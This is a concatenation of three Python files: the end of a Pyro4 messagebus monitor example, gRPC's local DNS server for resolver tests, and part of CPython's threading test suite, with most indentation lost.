# show a table of the active topics on the bus
while True:
clear_screen()
print(time.ctime(), "-- active topics on the messagebus:")
print("{:20} : {:5} {} {}".format("topic", "count", "last_recv", "last message data"))
for topic, count in sorted(subber.message_counter.items(), key=itemgetter(1), reverse=True):
msg = subber.last_message[topic]
if msg:
print("{:20} : {:5d} - {} {!r:.20}".format(topic, count, msg.created.time(), msg.data))
else:
print("{:20} : {:5d}".format(topic, count))
print("(restart me to refresh the list of topics)")
time.sleep(1)
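# Note: this example assumes a running Pyro4 name server plus the messagebus
# server from the same example; topics only appear once publishers are active.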
|
dns_server.py
|
#!/usr/bin/env python2.7
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starts a local DNS server for use in tests"""
import argparse
import sys
import yaml
import signal
import os
import threading
import time
import twisted
import twisted.internet
import twisted.internet.reactor
import twisted.internet.threads
import twisted.internet.defer
import twisted.internet.protocol
import twisted.names
import twisted.names.client
import twisted.names.dns
import twisted.names.server
from twisted.names import client, server, common, authority, dns
import platform
_SERVER_HEALTH_CHECK_RECORD_NAME = 'health-check-local-dns-server-is-alive.resolver-tests.grpctestingexp' # missing end '.' for twisted syntax
_SERVER_HEALTH_CHECK_RECORD_DATA = '123.123.123.123'
class NoFileAuthority(authority.FileAuthority):
def __init__(self, soa, records):
# skip FileAuthority
common.ResolverBase.__init__(self)
self.soa = soa
self.records = records
def start_local_dns_server(args):
all_records = {}
def _push_record(name, r):
print('pushing record: |%s|' % name)
if all_records.get(name) is not None:
all_records[name].append(r)
return
all_records[name] = [r]
def _maybe_split_up_txt_data(name, txt_data, r_ttl):
start = 0
txt_data_list = []
while len(txt_data[start:]) > 0:
next_read = len(txt_data[start:])
if next_read > 255:
next_read = 255
txt_data_list.append(txt_data[start:start+next_read])
start += next_read
_push_record(name, dns.Record_TXT(*txt_data_list, ttl=r_ttl))
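    # (RFC 1035 caps each TXT character-string at 255 octets, so e.g. a
    # 600-byte payload becomes 255 + 255 + 90 byte chunks inside a single
    # dns.Record_TXT.)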
with open(args.records_config_path) as config:
        test_records_config = yaml.safe_load(config)
common_zone_name = test_records_config['resolver_tests_common_zone_name']
for group in test_records_config['resolver_component_tests']:
for name in group['records'].keys():
for record in group['records'][name]:
r_type = record['type']
r_data = record['data']
r_ttl = int(record['TTL'])
record_full_name = '%s.%s' % (name, common_zone_name)
assert record_full_name[-1] == '.'
record_full_name = record_full_name[:-1]
if r_type == 'A':
_push_record(record_full_name, dns.Record_A(r_data, ttl=r_ttl))
if r_type == 'AAAA':
_push_record(record_full_name, dns.Record_AAAA(r_data, ttl=r_ttl))
if r_type == 'SRV':
p, w, port, target = r_data.split(' ')
p = int(p)
w = int(w)
port = int(port)
target_full_name = '%s.%s' % (target, common_zone_name)
r_data = '%s %s %s %s' % (p, w, port, target_full_name)
_push_record(record_full_name, dns.Record_SRV(p, w, port, target_full_name, ttl=r_ttl))
if r_type == 'TXT':
_maybe_split_up_txt_data(record_full_name, r_data, r_ttl)
    # Add an optional IPv4 record if specified
if args.add_a_record:
extra_host, extra_host_ipv4 = args.add_a_record.split(':')
_push_record(extra_host, dns.Record_A(extra_host_ipv4, ttl=0))
# Server health check record
_push_record(_SERVER_HEALTH_CHECK_RECORD_NAME, dns.Record_A(_SERVER_HEALTH_CHECK_RECORD_DATA, ttl=0))
soa_record = dns.Record_SOA(mname = common_zone_name)
test_domain_com = NoFileAuthority(
soa = (common_zone_name, soa_record),
records = all_records,
)
server = twisted.names.server.DNSServerFactory(
authorities=[test_domain_com], verbose=2)
server.noisy = 2
twisted.internet.reactor.listenTCP(args.port, server)
dns_proto = twisted.names.dns.DNSDatagramProtocol(server)
dns_proto.noisy = 2
twisted.internet.reactor.listenUDP(args.port, dns_proto)
print('starting local dns server on 127.0.0.1:%s' % args.port)
print('starting twisted.internet.reactor')
twisted.internet.reactor.suggestThreadPoolSize(1)
twisted.internet.reactor.run()
def _quit_on_signal(signum, _frame):
print('Received SIGNAL %d. Quitting with exit code 0' % signum)
twisted.internet.reactor.stop()
sys.stdout.flush()
sys.exit(0)
def flush_stdout_loop():
num_timeouts_so_far = 0
sleep_time = 1
# Prevent zombies. Tests that use this server are short-lived.
max_timeouts = 60 * 10
while num_timeouts_so_far < max_timeouts:
sys.stdout.flush()
time.sleep(sleep_time)
num_timeouts_so_far += 1
    print('Process timeout reached, or cancelled. Exiting 0.')
os.kill(os.getpid(), signal.SIGTERM)
def main():
argp = argparse.ArgumentParser(description='Local DNS Server for resolver tests')
argp.add_argument('-p', '--port', default=None, type=int,
help='Port for DNS server to listen on for TCP and UDP.')
argp.add_argument('-r', '--records_config_path', default=None, type=str,
help=('Directory of resolver_test_record_groups.yaml file. '
'Defaults to path needed when the test is invoked as part '
'of run_tests.py.'))
argp.add_argument('--add_a_record', default=None, type=str,
help=('Add an A record via the command line. Useful for when we '
'need to serve a one-off A record that is under a '
'different domain then the rest the records configured in '
'--records_config_path (which all need to be under the '
'same domain). Format: <name>:<ipv4 address>'))
args = argp.parse_args()
signal.signal(signal.SIGTERM, _quit_on_signal)
signal.signal(signal.SIGINT, _quit_on_signal)
output_flush_thread = threading.Thread(target=flush_stdout_loop)
output_flush_thread.setDaemon(True)
output_flush_thread.start()
start_local_dns_server(args)
if __name__ == '__main__':
main()
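# Example invocation (hypothetical port and record file):
#   python dns_server.py -p 15353 -r resolver_test_record_groups.yaml \
#       --add_a_record extra.host.example:1.2.3.4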
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import threading_helper, requires_subprocess
from test.support import verbose, cpython_only, os_helper
from test.support.import_helper import import_module
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
import textwrap
import traceback
from unittest import mock
from test import lock_tests
from test import support
threading_helper.requires_working_threading(module=True)
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# Is Python built with Py_DEBUG macro defined?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def restore_default_excepthook(testcase):
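    # Swap in the interpreter's default hook for the duration of the test;
    # addCleanup restores whatever hook was previously installed.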
testcase.addCleanup(setattr, threading, 'excepthook', threading.excepthook)
threading.excepthook = threading.__excepthook__
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = threading_helper.threading_setup()
def tearDown(self):
threading_helper.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
@cpython_only
def test_name(self):
def func(): pass
thread = threading.Thread(name="myname1")
self.assertEqual(thread.name, "myname1")
# Convert int name to str
thread = threading.Thread(name=123)
self.assertEqual(thread.name, "123")
# target name is ignored if name is specified
thread = threading.Thread(target=func, name="myname2")
self.assertEqual(thread.name, "myname2")
with mock.patch.object(threading, '_counter', return_value=2):
thread = threading.Thread(name="")
self.assertEqual(thread.name, "Thread-2")
with mock.patch.object(threading, '_counter', return_value=3):
thread = threading.Thread()
self.assertEqual(thread.name, "Thread-3")
with mock.patch.object(threading, '_counter', return_value=5):
thread = threading.Thread(target=func)
self.assertEqual(thread.name, "Thread-5 (func)")
def test_args_argument(self):
# bpo-45735: Using list or tuple as *args* in constructor could
# achieve the same effect.
num_list = [1]
num_tuple = (1,)
str_list = ["str"]
str_tuple = ("str",)
list_in_tuple = ([1],)
tuple_in_list = [(1,)]
test_cases = (
(num_list, lambda arg: self.assertEqual(arg, 1)),
(num_tuple, lambda arg: self.assertEqual(arg, 1)),
(str_list, lambda arg: self.assertEqual(arg, "str")),
(str_tuple, lambda arg: self.assertEqual(arg, "str")),
(list_in_tuple, lambda arg: self.assertEqual(arg, [1])),
(tuple_in_list, lambda arg: self.assertEqual(arg, (1,)))
)
for args, target in test_cases:
with self.subTest(target=target, args=args):
t = threading.Thread(target=target, args=args)
t.start()
@cpython_only
def test_disallow_instantiation(self):
# Ensure that the type disallows instantiation (bpo-43916)
lock = threading.Lock()
test.support.check_disallow_instantiation(self, type(lock))
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.current_thread().ident)
def f():
ident.append(threading.current_thread().ident)
done.set()
done = threading.Event()
ident = []
with threading_helper.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with threading_helper.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
restore_default_excepthook(self)
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
with self.assertWarnsRegex(DeprecationWarning,
r'get the daemon attribute'):
t.isDaemon()
with self.assertWarnsRegex(DeprecationWarning,
r'set the daemon attribute'):
t.setDaemon(True)
with self.assertWarnsRegex(DeprecationWarning,
r'get the name attribute'):
t.getName()
with self.assertWarnsRegex(DeprecationWarning,
r'set the name attribute'):
t.setName("name")
e = threading.Event()
with self.assertWarnsRegex(DeprecationWarning, 'use is_set()'):
e.isSet()
cond = threading.Condition()
cond.acquire()
with self.assertWarnsRegex(DeprecationWarning, 'use notify_all()'):
cond.notifyAll()
with self.assertWarnsRegex(DeprecationWarning, 'use active_count()'):
threading.activeCount()
with self.assertWarnsRegex(DeprecationWarning, 'use current_thread()'):
threading.currentThread()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@support.requires_fork()
def test_fork_at_exit(self):
# bpo-42350: Calling os.fork() after threading._shutdown() must
# not log an error.
code = textwrap.dedent("""
import atexit
import os
import sys
from test.support import wait_process
# Import the threading module to register its "at fork" callback
import threading
def exit_handler():
pid = os.fork()
if not pid:
print("child process ok", file=sys.stderr, flush=True)
# child process
else:
wait_process(pid, exitcode=0)
# exit_handler() will be called after threading._shutdown()
atexit.register(exit_handler)
""")
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err.rstrip(), b'child process ok')
@support.requires_fork()
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@support.requires_fork()
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
support.wait_process(pid, exitcode=10)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@support.requires_fork()
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
from test import support
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
support.wait_process(pid, exitcode=0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@support.requires_fork()
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
from test import support
def func():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
support.wait_process(pid, exitcode=0)
th = threading.Thread(target=func)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1 (func)\nTrue\nTrue\n")
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
        self.assertFalse(tstate_lock.acquire(timeout=0))
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
        self.assertTrue(tstate_lock.acquire(timeout=support.SHORT_TIMEOUT))
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
def test_gettrace(self):
def noop_trace(frame, event, arg):
# no operation
return noop_trace
old_trace = threading.gettrace()
try:
threading.settrace(noop_trace)
trace_func = threading.gettrace()
            self.assertEqual(noop_trace, trace_func)
finally:
threading.settrace(old_trace)
def test_getprofile(self):
def fn(*args): pass
old_profile = threading.getprofile()
try:
threading.setprofile(fn)
self.assertEqual(fn, threading.getprofile())
finally:
threading.setprofile(old_profile)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
def test_locals_at_exit(self):
# bpo-19466: thread locals must not be deleted before destructors
# are called
rc, out, err = assert_python_ok("-c", """if 1:
import threading
class Atexit:
def __del__(self):
print("thread_dict.atexit = %r" % thread_dict.atexit)
thread_dict = threading.local()
thread_dict.atexit = "value"
atexit = Atexit()
""")
self.assertEqual(out.rstrip(), b"thread_dict.atexit = 'value'")
def test_boolean_target(self):
# bpo-41149: A thread that had a boolean value of False would not
# run, regardless of whether it was callable. The correct behaviour
# is for a thread to do nothing if its target is None, and to call
# the target otherwise.
class BooleanTarget(object):
def __init__(self):
self.ran = False
def __bool__(self):
return False
def __call__(self):
self.ran = True
target = BooleanTarget()
thread = threading.Thread(target=target)
thread.start()
thread.join()
self.assertTrue(target.ran)
def test_leak_without_join(self):
# bpo-37788: Test that a thread which is not joined explicitly
# does not leak. Test written for reference leak checks.
def noop(): pass
with threading_helper.wait_threads_exit():
threading.Thread(target=noop).start()
# Thread.join() is not called
def test_import_from_another_thread(self):
# bpo-1596321: If the threading module is first import from a thread
# different than the main thread, threading._shutdown() must handle
# this case without logging an error at Python exit.
code = textwrap.dedent('''
import _thread
import sys
event = _thread.allocate_lock()
event.acquire()
def import_threading():
import threading
event.release()
if 'threading' in sys.modules:
raise Exception('threading is already imported')
_thread.start_new_thread(import_threading, ())
# wait until the threading module is imported
event.acquire()
event.release()
if 'threading' not in sys.modules:
raise Exception('threading is not imported')
# don't wait until the thread completes
''')
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@support.requires_fork()
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
from test import support
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@support.requires_fork()
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
from test import support
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
